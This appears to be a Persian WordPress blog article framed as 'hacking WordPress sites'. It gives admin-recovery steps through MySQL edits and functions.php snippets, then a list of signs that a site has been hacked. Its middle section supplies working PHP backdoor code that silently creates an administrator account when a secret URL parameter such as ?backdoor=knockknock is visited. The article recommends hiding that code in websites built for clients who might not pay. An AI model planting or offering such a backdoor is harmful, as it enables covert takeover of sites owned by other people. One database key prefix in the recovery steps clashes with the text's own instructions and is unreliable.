هک سایت وردپرسی می تواند به شدت خطرناک باشد. به این دلیل که اگر هکری بتواند این کار را به راحتی انجام دهد می تواند وب سایت های بسیار زیادی را هک کند. به این دلیل که در حال حاضر تعداد بسیار زیادی از سایت های فعال با استفاده از پلتفرم وردپرس ساخته شده اند. در این مقاله می خواهیم روش های هک سایت وردپرسی را به شما بگوییم. البته استفاده از این روش ها اصلا پیشنهاد نمی شود!. اگر هم صاحب یک سایت وردپرسی هستید در انتها روش های تشخیص هک سایتتان را به شما خواهیم گفت.

هک سایت وردپرسی

ما هیچ گونه رفتار غیرقانونی یا بدخواهانه را نمی پذیریم، تایید نمی کنیم و تشویق نمی کنیم!. هدف این مقاله توضیح چگونگی هک کردن یا دسترسی مجدد به سایت وردپرسی است. که متعلق به شماست. یا اینکه شما حقوق ویرایش، سرپرست و دسترسی به آن را دارید. هر کاری که انجام می دهید، به تنهایی آن را انجام می دهید.

روش‌های توصیف‌شده به شما کمک می‌کنند حتی اگر دیگر حسابی ندارید، دوباره به سایت دسترسی پیدا کنید. اما به اطلاعاتی در مورد سایت نیاز دارند و به شما کمک نمی‌کنند تا نصب تصادفی وردپرس را هک کنید.

اگر در یکی از شرایط زیر هستید، روش‌های ما به شما کمک می‌کنند تا دوباره دسترسی داشته باشید:

نام کاربری یا آدرس ایمیل را فراموش کرده اید
گزینه بازنشانی رمز عبور در سرور میزبان کار نمی کند
ایمیل های بازنشانی رمز عبور ارسال نمی شوند
دیگر به آدرس ایمیل حساب دسترسی ندارید
شما نام کاربری و رمز عبور را می دانید، اما این ترکیب کار نمی کند

برای استفاده از روش‌های شرح داده شده در زیر، فقط به یکی از موارد زیر نیاز دارید:

دسترسی FTP به سرور، یا
دسترسی سی پنل به سرور یا
دسترسی به پایگاه داده MySQL و امکان اتصال به آن از راه دور

روش شماره 1 – روش MySQL

از این روش برای تغییر رمز عبور (یا نام کاربری در صورت نیاز) یک کاربر موجود یا ایجاد یک حساب کاربری جدید استفاده کنید. شما به دسترسی cPanel یا دسترسی مستقیم MySQL به پایگاه داده سایت نیاز دارید. بیایید با تغییر رمز عبور یک کاربر موجود شروع کنیم.

اگر از cPanel استفاده می‌کنید، وارد شوید (cPanel همیشه از طریق پیوند https://yoursite.com:2083 قابل دسترسی است)، phpMyAdmin را پیدا کرده و باز کنید. لیست پایگاه های داده و جداول در سمت چپ است. شما به دنبال جدولی هستید که به _users ختم می شود. احتمالاً wp_users خواهد بود، اما اگر بیش از یک سایت وردپرس روی سرور نصب شده است، باید سایت مناسب را پیدا کنید.

جدول سمت راست، کاربری را که می‌خواهید ویرایش کنید را در خود دارد. اگر از طریق سرویس گیرنده خارجی مانند SQLyog به MySQL متصل می شوید، همین رویه را دنبال کنید. هنگامی که جدول و رکورد واقعی کاربر را پیدا کردید، وقت آن است که رمز عبور را تغییر دهید.

مهم:

همانطور که احتمالاً تاکنون متوجه شده اید، رمز عبور در قسمت user_pass ذخیره می شود و با استفاده از الگوریتم MD5 هش می شود. ژنراتور MD5 آنلاین را باز کنید، رمز عبوری را که می‌خواهید استفاده کنید وارد کنید و روی «Hash» کلیک کنید. رشته تولید شده را کپی کرده و رمز اصلی را با آن جایگزین کنید. در phpMyAdmin می توانید با دوبار کلیک کردن روی آن فیلد را ویرایش کنید. رویه مشابه سایر کلاینت های MySQL است. تغییرات را ذخیره کنید و با رمز عبور جدید خود وارد وردپرس شوید.
جدول کاربران WP نام‌های کاربری، گذرواژه‌های هش‌شده و ایمیل‌ها در جدول پایگاه داده wp_users ذخیره می‌شوند.

هنوز در روش شماره 1 هستیم- ایجاد یک کاربر جدید

ایجاد یک کاربر جدید کمی پیچیده تر است اما هنوز در کمتر از یک دقیقه قابل مدیریت است. یک رکورد جدید در جدول کاربر ایجاد کنید و user_login، user_pass (هش شده، با استفاده از تابع MD5 که در بالا توضیح داده شد) و user_email را پر کنید. تمام فیلدهای دیگر می توانند خالی بمانند. آنها مهم نیستند رکورد جدید را ذخیره کنید. پس از ذخیره، MySQL یک شناسه منحصر به فرد به آن می دهد. این شماره در قسمت شناسه است. آن را به خاطر بسپار.

اکنون به جدول _usermeta بروید. به یاد داشته باشید، پیشوند جدول باید با پیشوند کاربران یکی باشد. به عنوان مثال wp_users و wp_usersmeta. اگر پیشوند یکسان نیست، در حال ویرایش جدول اشتباهی (برخی نصب WP دیگر) هستید و حساب جدید کار نخواهد کرد. ما دو رکورد جدید ایجاد خواهیم کرد. فیلد umeta_id را برای هر دوی آنها نادیده بگیرید. فیلد user_id را روی مقداری که به تازگی به خاطر آورده اید (مقدار شناسه جدید در جدول کاربر) تنظیم کنید. برای اولین رکورد،  meta_key را روی wpct_user_level و meta_value را به 10 تنظیم کنید.

برای دومین meta_key را به wpct_capabilities و  meta_value را به a:1:{s:13:”administrator”;b:1;} تنظیم کنید. هر دو را ذخیره کنید. کار شما تمام شد – وارد شوید!

روش شماره 2 – راه functions.php

این رویکرد را می توان با ویرایش functions.php از طریق cPanel یا با استفاده از یک سرویس گیرنده FTP برای انجام این کار مورد استفاده قرار داد. اگر از cPanel استفاده می کنید، File Manager را پیدا کنید و آن را باز کنید. ابتدا باید پوشه تم فعال را پیدا کنیم.

به پوشه public_html/wp_content/themes بروید. اگر بلافاصله موضوع خود را مشاهده کردید و بدانید که کدام یک است – عالی است. پوشه آن را باز کنید و ویرایش functions.php را شروع کنید. اگر نه، سایت را باز کنید، در هر نقطه راست کلیک کنید، “مشاهده منبع” را انتخاب کنید. سپس Ctrl + F را فشار دهید و شروع به تایپ /themes/  کنید به زودی نشانی‌های اینترنتی زیادی برجسته می‌شوید و نام پوشه تم فعال را می‌شناسید.

آن را در ساختار فایل پیدا کنید، آن را باز کنید و ویرایش functions.php را شروع کنید. کد زیر را در انتهای فایل کپی/پیست کنید. اگر برچسب‌های PHP را دارید، به پایان  ؟>  توجه کنید. آنها باید در خط آخر باشند. بنابراین، کد را قبل از آنها وارد کنید.

$new_user_email = 'myemail@domain.com';
$new_user_password = '12345';

if(!username_exists($new_user_email)) {
  $user_id = wp_create_user($new_user_email, 
$new_user_password, $new_user_email);

  wp_update_user(array('ID' => $user_id, 'nickname' 
=> $new_user_email));

  $user = new WP_User($user_id);
  $user->set_role('administrator');
}

مهم:

خطوط کد برای منعکس کردن حساب جدید شما. اگر قبلاً کاربری در WP با آن ایمیل وجود داشته باشد، حساب جدیدی ایجاد نخواهد شد، بنابراین مطمئن شوید که جدید است. رمز عبور را نیز تغییر دهید – توسط بچه های اسکریپت هک نشوید. پس از ذخیره فایل، به سادگی سایت خود را باز کنید، کد اجرا می شود، یک حساب کاربری جدید با امتیازات سرپرست ایجاد می شود و می توانید با آن وارد سیستم شوید.

پس از انجام این کار، به یاد داشته باشید که کد را از functions.php حذف کنید.

سایر روش های هک

با دانستن رمز عبور FTP، cPanel یا MySQL ثابت می‌کنید که حق دسترسی قانونی به سرور را دارید . بنابراین باید به نصب(های) وردپرس نیز دسترسی داشته باشید. اگر هیچکدام از آن حساب‌ها را ندارید، در این صورت کار خوبی ندارید (هک کردن سایت‌های افراد دیگر)، و این خوب نیست!

لطفاً به یاد داشته باشید که دسترسی غیرمجاز به هر رایانه، سایت یا سرور یک جرم جدی است و در اکثر کشورها به سرعت با آن برخورد می شود.

نحوه ایجاد درب پشتی در وردپرس

وقتی درب جلو بسته است، ممکن است درب عقب را امتحان کنید. این ممکن است مانند یک روش مخرب برای استفاده از کد برای ورود به سایت بدون دسترسی به آن به نظر برسد، اما در واقع مواقعی وجود دارد که اگر شخصی آن را به سرقت برد، باید سایت خود را کنترل کنید.

اگر کاری که شما انجام می دهید برای افراد دیگر وب سایت ایجاد می کند، دیر یا زود مشتری پیدا می شود که از پرداخت پول برای کار شما امتناع می کند. مشتری که اطلاعات ورود شما را حذف می کند و کنترل همه کارهایی که انجام داده اید را به دست می گیرد. گاهی اوقات، ایجاد یک کاربر جدید از طریق FTP یا بازنشانی رمز عبور کافی است. وقتی این کافی نیست، ممکن است بخواهید راه خود را به داخل هک کنید یا دسترسی درب پشتی به صفحات مدیریت خود ایجاد کنید.

اما اگر تصمیم گرفتید قطعه کوچکی از کد را در محیط وردپرس خود مخفی کنید، ممکن است کمی وقار خود را حفظ کنید و با امتیازات مدیر به سایت وردپرس دسترسی پیدا کنید. و این جایی است که بازی ها شروع می شوند.

ایجاد یک درب پشتی:

خوب، با صحبت کافی است. در اینجا یک قطعه کد وجود دارد که برای انجام کار به آن نیاز دارید:

فایل functions.php را باز کنید
کد زیر را کپی/پیست کنید:

 

add_action('wp_head', 'wploop_backdoor'); 
function wploop_backdoor() {
If ($_GET['backdoor'] == 'knockknock') {
require('wp-includes/registration.php');
If (!username_exists('username')) {
$user_id = wp_create_user('name', 'pass');
$user = new WP_User($user_id);
$user->set_role('administrator');
}
}
}
?>

 

ذخیره تغییرات

اگر کد را همانطور که هست بگذارید، تنها کاری که باید برای ایجاد یک سرپرست جدید در سایت انجام دهید این است که از http://www.yourdomain.com/?backdoor=knockknock بازدید کنید.

پس از بارگیری صفحه، نام کاربری جدید شما «name» و رمز عبور «password» است.

البته، می‌توانید با تغییر «name» و «pass» به هر چیزی که می‌خواهید، آن را در کد بالا تغییر دهید. همچنین می‌توانید با تغییر «درپشتی» به هر چیزی که به ذهنتان می‌رسد، پیوند به در پشتی خود را تغییر دهید.

این عملکرد را امتحان کنید – نه تنها سرگرم کننده است، بلکه واقعاً می تواند در آینده به شما کمک کند، زمانی که می خواهید یک وب سایت برای شخصی بسازید که نمی توانید کاملاً به او اعتماد کنید. همچنین باید مهارت های وردپرس و وبلاگ نویسی خود را ارتقا دهید.

نحوه ایجاد یک حساب کاربری جدید از طریق FTP

ایجاد حساب‌های کاربری جدید در وردپرس بسیار آسان است. به عنوان یک مدیر، باید به صفحه مدیریت کاربران بروید، جایی که می توانید یک حساب کاربری جدید برای هر نقش کاربری ایجاد کنید. این کار را می توان در عرض چند ثانیه انجام داد و کاربر تازه ایجاد شده می تواند بلافاصله با نام کاربری و رمز عبور داده شده وارد شود.

اما اگر دسترسی به ادمین وردپرس خود را از دست بدهید چه اتفاقی می افتد؟ ممکن است اوضاع کمی پیچیده‌تر شود، اما نگران نباشید – ما یک عملکرد برای شما داریم که می‌تواند زندگی مدیر شما را نجات دهد.

چه سرپرست دیگری حساب شما را حذف کرده باشد، چه همه کاربران را به اشتباه از پایگاه داده حذف کرده باشید، از یک افزونه ناکارآمد استفاده کرده باشید یا هک شده باشید، همچنان می‌توانید کنترل را به دست بگیرید. گاهی اوقات ممکن است بتوانید فقط به سرور FTP خود دسترسی داشته باشید در حالی که HTTP از دسترس شما خارج است و باید یک مدیر جدید ایجاد کنید. در حالی که ممکن است یک مورد نادر باشد، عملکرد زیر شما را نجات می دهد.

نکته

برای ایجاد یک حساب کاربری جدید خارج از محیط مدیریت وردپرس، تنها چیزی که نیاز دارید دسترسی FTP به سایت خود است. به عنوان یک ادمین، شما باید تمام اطلاعات مورد نیاز برای ورود به سرور خود را داشته باشید و می توانید با ایجاد یک تابع جدید در قالب خود، به سرعت یک حساب کاربری جدید ایجاد کنید.

ایجاد یک حساب کاربری جدید از طریق FTP:

کلاینت FTP را باز کنید و به حساب خود متصل شوید
به wp-content/themes بروید
پوشه تم مورد استفاده خود را باز کنید
فایل functions.php را جستجو کرده و آن را ویرایش کنید
تابع زیر را کپی و پیست کنید:

function admin_account(){
$user = 'Username';
$pass = 'Password';
$email = 'email@domain.com';
if ( !username_exists( $user )  && !email_exists( 
$email ) ) {
$user_id = wp_create_user( $user, $pass, $email );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
} }
add_action('init','admin_account');

نام کاربری، رمز عبور و ایمیل را به چیزی منحصربفرد تغییر دهید

ذخیره تغییرات

مطمئن شوید که نام کاربری، رمز عبور و آدرس ایمیلی که در تابع تنظیم کرده‌اید منحصربه‌فرد هستند یا در غیر این صورت عملکرد به درستی کار نمی‌کند. وقتی تغییرات را ذخیره کردید، کارتان تمام شد و می‌توانید به پانل ورود به سیستم WP خود بروید. از اطلاعات جدید برای ورود مجدد استفاده کنید و پس از تأیید حساب، می توانید تابع را از فایل functions.php حذف کنید.

عملکرد نشان داده شده در بالا یک حساب کاربری ایجاد می کند، اما می توانید به راحتی آن را تغییر دهید تا یک حساب کاربری با هر نقش کاربری دیگری ایجاد کنید. به سادگی نقش موجود در ردیف هشتم کد را به ویرایشگر، نویسنده، مشارکت‌کننده، مشترک یا هر نقش کاربری دیگری که ایجاد کرده‌اید تغییر دهید.

متأسفانه، اگر حساب کاربری ادمین خود را از دست داده باشید، تمام پست هایی که تحت آن نام کاربری نوشته شده اند را نیز از دست داده اید. به همین دلیل است که همیشه باید یک نسخه پشتیبان داشته باشید که بتوانید به راحتی آن را بازیابی کنید. اگر در حین داشتن حساب مدیریت خود این مطلب را می خوانید، این را به عنوان یادآوری برای ایجاد یک نسخه پشتیبان فوراً در نظر بگیرید و این مقاله را نشانه گذاری کنید فقط در صورتی که در آینده نیاز به ایجاد یک حساب کاربری خارج از وردپرس داشته باشید.

10 نشانه هک شدن سایت وردپرس شما

وردپرس یک پلت فرم وبلاگ نویسی بزرگ است. میلیون ها کاربر وجود دارد و به نظر می رسد که تعداد آنها هر روز به سرعت در حال افزایش است. مردم حتی تمایل دارند وب سایت های خود را که در سیستم های مدیریت محتوای دیگر ایجاد شده اند، بیشتر از آنچه فکر می کنید به این سیستم منبع باز منتقل کنند. و در حالی که این خوب است، به این معنی است که هکرها در هنگام تلاش برای حمله به سایت‌های تصادفی، وردپرس را در رتبه اول قرار می‌دهند.

معمولاً اگر هک شوید، فوراً از آن مطلع خواهید شد. سایت شما غیر قابل دسترس خواهد شد. شما نمی توانید وارد شوید و گاهی اوقات یک هکر پیامی را در صفحه اول می گذارد. اما اغلب اوقات، ممکن است حتی متوجه تغییر چیزی نشوید. در این قسمت از مقاله، ما قصد داریم چندین نشانه را به شما نشان دهیم که ممکن است به شما نشان دهد که سایت وردپرس شما هک شده است و چند راه حل برای این مشکل.

1. ورود ناموفق

این علامت تقریباً مشهود است. اگر برای مدتی بدون مشکل از ترکیب نام کاربری و رمز عبور استفاده کرده اید، اگر ناگهان وردپرس حساب شما را نشناسد ممکن است مشکوک شوید. اگر یک هکر وارد سایت شما شود، این احتمال وجود دارد که به سرعت امتیازات مدیریت شما را تغییر دهد.

شاید او مجبور به تغییر رمز عبور شما یا حذف کامل حساب شما شده است. قبل از اینکه بعد از اولین باری که وردپرس در مورد نام کاربری/رمز عبور نادرست به شما پیام می‌دهد وحشت کنید، لطفاً این واقعیت را در نظر بگیرید که ممکن است ترکیب اشتباهی وارد کرده باشید یا ممکن است دکمه caps lock را روشن کرده باشید.

راه حل: سعی کنید رمز عبور را از طریق ایمیل بازیابی کنید یا از حساب دیگری برای ورود مجدد استفاده کنید. برای اطمینان از ایمن ماندن ورود به سیستم، توصیه می کنیم افزونه Login Ninja را برای وردپرس نصب کنید.

2. محتوای مخرب به سایت شما اضافه می شود یا سایت حاوی یک هشدار بدافزار است

اگر متوجه محتوای ناآشنا در سایت خود شوید، ممکن است شروع به نگرانی کنید. زمانی که هکرها فرصتی برای دسترسی به بخش مدیریت شما پیدا می کنند، می توانند هسته شما و هم تم و هم فایل های افزونه شما را تغییر دهند. این بدان معناست که آنها می توانند هر چیزی را که می خواهند تغییر دهند.

در حالی که برخی از هکرها ظاهر سایت شما را به شدت تغییر می دهند و حتی ممکن است بگویند که شما هک شده اید، سایرین در مورد آن بسیار ظریف تر خواهند بود.

راه حل: سعی کنید به دنبال محتوای پنهان در کد وب سایت باشید. ممکن است لینک هایی به سایت های مخرب هکرها در پاورقی سایت شما نصب شده باشد، یا ممکن است پنجره های بازشو نصب کرده باشند که به طور منظم برای مشتریان شما باز می شوند. از Security Ninja استفاده کنید تا سایت خود را اسکن کنید یا به طور مداوم سایت خود را برای چنین مشکلاتی زیر نظر داشته باشید.

3. ملاقات های مشکوک

اگر وب سایت خود را ردیابی نمی کنید، باید بلافاصله این کار را شروع کنید. یک راه ساده برای انجام این کار، استفاده از Google Analytics است که در میان بسیاری از ویژگی‌های دیگر، می‌تواند به شما بگوید چه تعداد بازدید می‌کنید و این بازدیدها از کجا می‌آیند. پس از مدتی با وب سایت خود آشنا خواهید شد. این بدان معناست که می‌دانید بازدیدها از کجا می‌آیند، می‌دانید چه زمانی یک کمپین جدید راه‌اندازی می‌کنید و چه زمانی لینک‌های تبلیغاتی جدید در طبیعت منتشر می‌شوند.

اما اگر به طور ناگهانی متوجه شدید که سایت شما تعداد زیادی بازدید جدید از دامنه مشکوک دریافت می کند، می خواهید این موضوع را بیشتر بررسی کنید زیرا ممکن است سایت شما هک شود. معمولاً این نوع بازدید منجر به نرخ پرش 100٪ می شود که به این معنی است که فقط یک صفحه قابل دسترسی است. هکرها اغلب از سیستم های خودکار استفاده می کنند که سایر سایت های بد را به سایت شما هدایت می کند. خواه کد بدی باشد که در سایت شما اجرا می شود یا بخشی از یک شبکه اسپم شده اید، همه چیز می تواند جدی شود و شما باید سایت خود را برای کدهای مخرب بررسی کنید.

راه حل: از Google Webmasters Tools برای یافتن دامنه های مشکوک استفاده کنید. با این کار می توانید از هک سایت وردپرسی خود جلوگیری کنید.

4. کاهش ناگهانی ترافیک

برخلاف آخرین علامت ذکر شده در مورد هک شدن، این مورد ممکن است به شما هشدار دهد زیرا به طور ناگهانی تعداد بازدیدها کاهش می یابد. یک هکر به جای ارجاع بازدیدهای جدید به شما، ممکن است بازدیدها را از سایت شما دور کند. این ممکن است به این دلیل اتفاق بیفتد که یک هکر سایت شما را به سایت دیگری هدایت کرده است. دلیل دیگر کاهش بازدیدکنندگان این است که گوگل سایت شما را در لیست سیاه قرار داده است. این عمل به هر کاربری که ممکن است تصمیم بگیرد سایت شما را به دلیل آلوده بودن باز نکند، پیامی نشان می دهد.

راه حل: از «وضعیت سایت مرور ایمن Google» استفاده کنید تا بررسی کنید آیا سایت شما به‌عنوان ناامن علامت‌گذاری شده است و بازدید از آن در حال حاضر خطرناک است.

5. نتایج موتورهای جستجو عجیب است

اگر هیچ تغییری در سایت خود مشاهده نکرده اید، اما متوجه شده اید که نتایج جستجو در گوگل و سایر موتورهای جستجو عجیب هستند (عناوین مختلف و سایر متا داده ها را نشان می دهد)، این ممکن است نشانه واضحی از یک سایت هک شده باشد. ممکن است یک هکر محتوای شما را طوری تغییر داده باشد که فقط برای یک متخصص قابل مشاهده باشد. با این حال، این تغییر در نتایج موتور جستجو قابل مشاهده است.

راه حل: سایت خود را با Google Webmasters Tools بررسی کنید و بررسی کنید که آیا سایت شما با این ابزار آنلاین رایگان هک شده است.

6. شما نمی توانید ایمیل ارسال یا دریافت کنید

هنگامی که یک هکر به سایت شما دسترسی پیدا می کند، احتمالاً می خواهد از سرور شما برای ارسال هرزنامه به دیگران استفاده کند. وقتی متوجه می شوید که نمی توانید ایمیل های جدیدی از وردپرس خود ارسال یا دریافت کنید، این می تواند نشانه واضحی از هک شدن شما باشد. یک بار دیگر ایمیل خود را بررسی کنید، سپس آن را با ارائه دهنده خود بررسی کنید تا مطمئن شوید که هیچ خطایی وجود ندارد.

راه حل: عملکرد ایمیل وردپرس خود را با این افزونه رایگان آزمایش کنید.

7. سایت وجود ندارد یا سرور یافت نشد را می بینید

مواقعی وجود دارد که هکرها برای نصب کدهای مخرب، هدایت کاربران یا استفاده از ایمیل شما برای هرزنامه به سایت شما دسترسی نمی‌یابند. گاهی اوقات، تنها کاری که آنها می خواهند انجام دهند این است که سایت شما را خراب کنند. به ندرت، یک هکر با موفقیت همه چیز را از کل سرور حذف می کند. به همین دلیل مهم است که فایل‌های خود را در یک شرکت میزبانی معروف میزبانی کنید که امنیت را به همراه داشته باشد و همچنین روزانه یا حداقل هفتگی از وب‌سایت شما نسخه پشتیبان تهیه کند. این یک تمرین خوب است که هر از چند گاهی از خودتان نسخه‌های پشتیبان تهیه کنید تا سایت به سرعت بازیابی شود.

راه حل: یکی از بهترین افزونه ها برای مدیریت پشتیبان در وردپرس را نصب کنید. با این کار از هک سایت وردپرسی خود جلوگیری می کنید.

 

بیشتر بخوانید :  9 روش برای جلوگیری از هک سایت

 

8. فایل های مشکوک

مشابه محتوای مخربی که ممکن است به فایل‌های موجود اضافه شود، یک هکر ممکن است فایل‌های اضافی را در هر جایی از پوشه ریشه شما نصب کند. دانستن راه خود در وردپرس چیز خوبی است، اما اگر آنقدر باتجربه نیستید، باید یک ابزار امنیتی در اختیار داشته باشید که می تواند تمام فایل ها و فعالیت های شما را بررسی کند. اخیراً، Security Ninja را بررسی کردیم که ابزاری عالی برای بررسی همه فایل‌های وردپرس شماست.

راه حل: سعی کنید به دنبال فایل هایی بگردید که به نصب وردپرس شما تعلق ندارند. از امنیت نینجا برای اسکن کردن سایت خود به طور منظم و یافتن خودکار آن فایل ها استفاده کنید. سپس فایل ها را حذف کنید یا کدهای مخرب را از فایل های آلوده حذف کنید. افزونه Core Scanner برای Security Ninja را فراموش نکنید.

9. اعضای جدید

بسته به سایت خود، ممکن است شما تنها کسی باشید که می توانید اعضای جدید اضافه کنید. در این صورت، ایمیلی که به شما در مورد کاربرانی که به تازگی ثبت نام کرده اند می گوید ممکن است یک زنگ هشدار ایجاد کند. اگر مدیران دیگری هستند که توانایی اضافه کردن اعضای جدید را دارند، در مورد فعالیت مشکوک با آنها مشورت کنید.

راه حل: URL ورود به سیستم را با یک افزونه رایگان تغییر دهید، دسترسی به صفحه ورود به سیستم وردپرس خود را با استفاده از فایل .htpasswd محدود کنید و همیشه از Login Ninja استفاده کنید تا از فرم ورود خود محافظت کنید.

10. رویدادهای برنامه ریزی شده را در سرور خود بررسی کنید

گاهی اوقات، یک هکر پس از یافتن راه خود، کاری با وب‌سایت شما انجام نمی‌دهد. در عوض، رویدادهای برنامه‌ریزی‌شده‌ای را ترک می‌کند که ممکن است در آینده به سایت شما آسیب برساند. این تکنیک خطرناک است زیرا یک هکر می تواند قربانیان بی تجربه را در ابتدا بی خبر بگذارد. ممکن است شما آلوده شده باشید و چیزی در مورد آن ندانید.

راه حل: کارهای CRON خود را در سروری که از آن استفاده می کنید بررسی کنید و مطمئن شوید که هیچ کار مشکوکی برنامه ریزی شده وجود ندارد.

نتیجه

امیدواریم این مقاله به شما کمک کند حتی یک سایت وردپرس ایمن تر را مدیریت کنید و در شرایط بد به شما کمک کند دوباره به آن دسترسی پیدا کنید. و حتی اگر سایت شما تمیز است، لطفاً آن را بدیهی نگیرید. همیشه مطمئن شوید که وبلاگ شما تا آنجا که می تواند ایمن باشد. ما افزونه‌های امنیتی را برای وردپرس پیشنهاد می‌کنیم که در بیشتر مواقع می‌توانند شما را نجات دهند. با این حال، کسی نباشید که از گذرواژه ناامن استفاده می‌کند و هنگام هک کردن سایت وردپرس خود مراقب باشید.